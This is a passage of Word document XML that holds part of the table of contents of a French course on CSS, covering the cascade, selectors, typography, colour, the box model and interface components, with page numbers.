          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>102</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>9.2 Trois façons d'intégrer du CSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>102</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>9.3 La cascade : qui gagne ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>103</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>9.4 Héritage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>104</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>9.5 Sélecteurs et combinateurs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>105</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>9.6 Diagnostiquer une règle qui ne s'applique pas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>105</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>10. Sélecteurs, variables et unités</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>111</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>10.1 Pseudo-classes : décrire un état</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>111</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>10.2 Pseudo-éléments : créer sans ajouter de balise</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>112</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>10.3 Variables CSS : une source unique de vérité</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>113</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>10.4 Unités : choisir la bonne échelle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>114</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>10.5 Construire des sélecteurs robustes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>114</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>11. Typographie web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>120</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>11.1 Choisir une police</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>120</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>11.2 Charger une police correctement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>120</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>11.3 Construire une échelle typographique</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>122</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>11.4 Lisibilité : interligne, mesure, espacement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>122</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>11.5 Typographie française</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>123</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>11.6 Typographie et accessibilité</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>124</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>12. Couleurs, fonds et contrastes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>129</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>12.1 Quatre syntaxes pour une même couleur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>129</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>12.2 Construire une palette</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>129</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>12.3 Contraste : la contrainte mesurable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>130</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>12.4 Arrière-plans et dégradés</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>131</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>12.5 La couleur comme information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>132</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>13. Le modèle de boîte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>138</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>13.1 Quatre couches</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>138</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>13.2 box-sizing : la décision structurante</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>139</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>13.3 Marges, remplissages et raccourcis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>140</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>13.4 Fusion des marges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>140</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>13.5 Modes d'affichage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>141</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>13.6 Débordements et dimensions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>142</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>14. Bordures, ombres et profondeur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>147</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>14.1 Bordures : délimiter sans alourdir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>147</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>14.2 Ombres : une illusion de profondeur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>148</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>14.3 Hiérarchie visuelle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>149</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>14.4 Effets et sobriété</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>149</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>14.5 Mode sombre et contraste élevé</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>150</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>15. Composants d'interface et états</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>155</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>15.1 Qu'est-ce qu'un composant ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>155</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>15.2 Les états d'un élément interactif</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
